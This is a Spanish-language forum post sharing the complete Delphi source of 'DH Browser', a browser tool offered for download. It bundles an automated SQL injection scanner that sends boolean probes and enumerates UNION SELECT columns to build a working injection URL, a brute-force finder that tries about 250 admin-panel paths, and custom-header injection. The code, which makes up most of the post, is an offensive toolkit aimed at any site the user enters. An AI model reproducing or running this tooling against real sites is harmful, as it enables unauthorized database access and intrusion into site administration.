Un simple browser que hice en Delphi con las siguientes opciones :
[+] Podes ver el codigo HTML de la pagina cargada
[+] Se puede buscar palabras en el codigo HTML
[+] Poder modificar los headers para HTTP header injection
[+] Trae un SQLI Scanner para buscar vulnerabilidades SQLI
[+] Trae un PanelFinder para buscar el panel del admin
Unas imagenes :
![]()
![]()
El codigo :
Carga
Navegador
Si lo quieren bajar lo pueden hacer de aca.
[+] Podes ver el codigo HTML de la pagina cargada
[+] Se puede buscar palabras en el codigo HTML
[+] Poder modificar los headers para HTTP header injection
[+] Trae un SQLI Scanner para buscar vulnerabilidades SQLI
[+] Trae un PanelFinder para buscar el panel del admin
Unas imagenes :
El codigo :
Carga
Código:
// DH Browser 0.2
// (C) Doddy Hackman 2013
unit dhbrowse;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, acPNG, ExtCtrls, ComCtrls, acProgressBar, sGroupBox,
sSkinManager;
type
TForm1 = class(TForm)
sGroupBox1: TsGroupBox;
sProgressBar1: TsProgressBar;
Timer1: TTimer;
Image1: TImage;
sSkinManager1: TsSkinManager;
procedure Button1Click(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
uses programa;
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
begin
Form2.Show;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
sSkinManager1.SkinName := 'tv-b';
sSkinManager1.Active := True;
end;
procedure TForm1.Timer1Timer(Sender: TObject);
var
i: integer;
total: integer;
begin
total := 0;
sProgressBar1.Min := 0;
sProgressBar1.Max := 100;
For i := 1 to 100 do
begin
Form1.Update;
Sleep(1000);
// Sleep(1);
total := total + 10;
sProgressBar1.Position := total;
if (sProgressBar1.Position = 100) then
begin
Timer1.Enabled := False;
Form1.Hide;
Form2.Show;
Abort;
end;
end;
end;
end.
// The End ?Código:
// DH Browser 0.2
// (C) Doddy Hackman 2013
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
unit programa;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG,
ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent,
IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;
type
TForm2 = class(TForm)
sSkinManager1: TsSkinManager;
sGroupBox1: TsGroupBox;
sEdit1: TsEdit;
sButton1: TsButton;
sGroupBox2: TsGroupBox;
sMemo1: TsMemo;
sCheckBox1: TsCheckBox;
sGroupBox3: TsGroupBox;
sStatusBar1: TsStatusBar;
WebBrowser1: TWebBrowser;
sGroupBox4: TsGroupBox;
sButton2: TsButton;
sButton3: TsButton;
sGroupBox5: TsGroupBox;
sButton4: TsButton;
sLabel1: TsLabel;
Image1: TImage;
sMemo2: TsMemo;
PopupMenu1: TPopupMenu;
S1: TMenuItem;
S2: TMenuItem;
IdHTTP1: TIdHTTP;
PerlRegEx1: TPerlRegEx;
FindDialog1: TFindDialog;
sProgressBar1: TsProgressBar;
procedure sButton1Click(Sender: TObject);
procedure S1Click(Sender: TObject);
procedure S2Click(Sender: TObject);
procedure sButton3Click(Sender: TObject);
procedure sButton2Click(Sender: TObject);
procedure sButton4Click(Sender: TObject);
procedure FindDialog1Find(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure WebBrowser1ProgressChange(ASender: TObject;
Progress, ProgressMax: Integer);
procedure WebBrowser1DownloadComplete(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form2: TForm2;
implementation
{$R *.dfm}
procedure TForm2.FindDialog1Find(Sender: TObject);
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
var
aca: PChar;
aca2: PChar;
acatoy: PChar;
acatoy2: Word;
begin
With Sender as TFindDialog do
begin
GetMem(aca2, Length(FindText) + 1);
StrPCopy(aca2, FindText);
acatoy2 := sMemo2.GetTextLen + 1;
GetMem(aca, acatoy2);
sMemo2.GetTextBuf(aca, acatoy2);
acatoy := aca + sMemo2.SelStart + sMemo2.SelLength;
acatoy := StrPos(acatoy, aca2);
if not(acatoy = NIL) then
begin
sMemo2.SelStart := acatoy - aca;
sMemo2.SelLength := Length(FindText);
end;
sMemo2.SetFocus;
end;
end;
procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
begin
Application.Terminate;
end;
procedure TForm2.FormCreate(Sender: TObject);
begin
sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
sSkinManager1.SkinName := 'tv-b';
sSkinManager1.Active := True;
end;
procedure TForm2.S1Click(Sender: TObject);
begin
WebBrowser1.Visible := false;
sMemo2.Visible := True;
end;
procedure TForm2.S2Click(Sender: TObject);
begin
WebBrowser1.Visible := True;
sMemo2.Visible := false;
end;
procedure TForm2.sButton1Click(Sender: TObject);
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
var
cabeceras: OLEVariant;
uno: OLEVariant;
dos: OLEVariant;
tres: OLEVariant;
begin
uno := navNoReadFromCache or navNoWriteToCache;
dos := '';
tres := '';
if (sCheckBox1.Checked) then
begin
cabeceras := sMemo1.Text;
WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
end
else
begin
cabeceras := '';
WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
end;
end;
procedure TForm2.sButton2Click(Sender: TObject);
var
pass1: string;
pass2: string;
code: string;
urltest: string;
urlgen: string;
full: string;
codedos: string;
i: Integer;
begin
sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
Form2.sStatusBar1.Update;
pass1 := '+';
pass2 := '--';
urltest := 'concat(0x4b30425241,1,0x4b30425241)';
sStatusBar1.Panels[0].Text := '[+] Checking ...';
Form2.sStatusBar1.Update;
code := IdHTTP1.Get
(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);
codedos := IdHTTP1.Get
(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);
if not(code = codedos) then
begin
sStatusBar1.Panels[0].Text := '[+] Finding columns number';
Form2.sStatusBar1.Update;
urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
urlgen := '1';
for i := 2 to 36 do
begin
sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
Form2.sStatusBar1.Update;
urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
+ ',0x4b30425241)';
urlgen := urlgen + ',' + IntToStr(i);
code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
PerlRegEx1.Subject := code;
if PerlRegEx1.Match then
begin
urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1],
'hackman', []);
full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
'union' + pass1 + 'select' + pass1 + urlgen;
sEdit1.Text := full;
Abort;
end;
end;
end;
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end;
procedure TForm2.sButton3Click(Sender: TObject);
const
paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp', 'administracion/login.aspx',
'administracion/webmaster.asp', 'administracion/webmaster.aspx',
'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php', 'admin/login.php',
'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
'admin/default.php', 'administracion/', 'administracion/index.php',
'administracion/login.php', 'administracion/ingresar.php',
'administracion/admin.php', 'administration/', 'administration/index.php',
'administration/login.php', 'administrator/index.php',
'administrator/login.php', 'administrator/system.php', 'system/',
'system/login.php', 'admin.php', 'login.php', 'administrador.php',
'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
'admin/index.html', 'admin/login.html', 'admin/home.php',
'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
'administrator/index.html', 'administrator/login.html',
'administrator/account.html', 'administrator/account.php',
'administrator.html', 'login.html', 'modelsearch/login.php',
'moderator.php', 'moderator.html', 'moderator/login.php',
'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
'moderator/', 'account.php', 'account.html', 'controlpanel/',
'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp', 'administrator/login.asp',
'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
'system_administration/', 'ss_vms_admin_sm/');
var
IdHTTP: TIdHTTP;
i: Integer;
control: Integer;
begin
control := 0;
sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
Form2.sStatusBar1.Update;
IdHTTP := TIdHTTP.Create(nil);
for i := Low(paginas) to High(paginas) do
if (control = 1) then
begin
Abort;
end
else
begin
try
sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
Form2.sStatusBar1.Update;
IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
if IdHTTP.ResponseCode = 200 then
begin
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
sEdit1.Text := sEdit1.Text + '/' + paginas[i];
control := 1;
end;
except
on E: EIdHttpProtocolException do
;
on E: Exception do
;
end;
end;
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end;
procedure TForm2.sButton4Click(Sender: TObject);
begin
FindDialog1.Execute;
end;
procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
var
buscador: IHTMLElement;
begin
sProgressBar1.Position := 0;
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
begin
try
begin
sMemo2.Clear;
buscador := (WebBrowser1.Document AS IHTMLDocument2).body;
while not(buscador.parentElement = nil) do
begin
buscador := buscador.parentElement;
end;
sMemo2.Lines.Add(buscador.outerHTML);
end;
except
// ??
end;
end;
end;
procedure TForm2.WebBrowser1ProgressChange(ASender: TObject;
Progress, ProgressMax: Integer);
begin
sProgressBar1.Max := ProgressMax;
sProgressBar1.Position := Progress;
end;
end.
// The End ?Si lo quieren bajar lo pueden hacer de aca.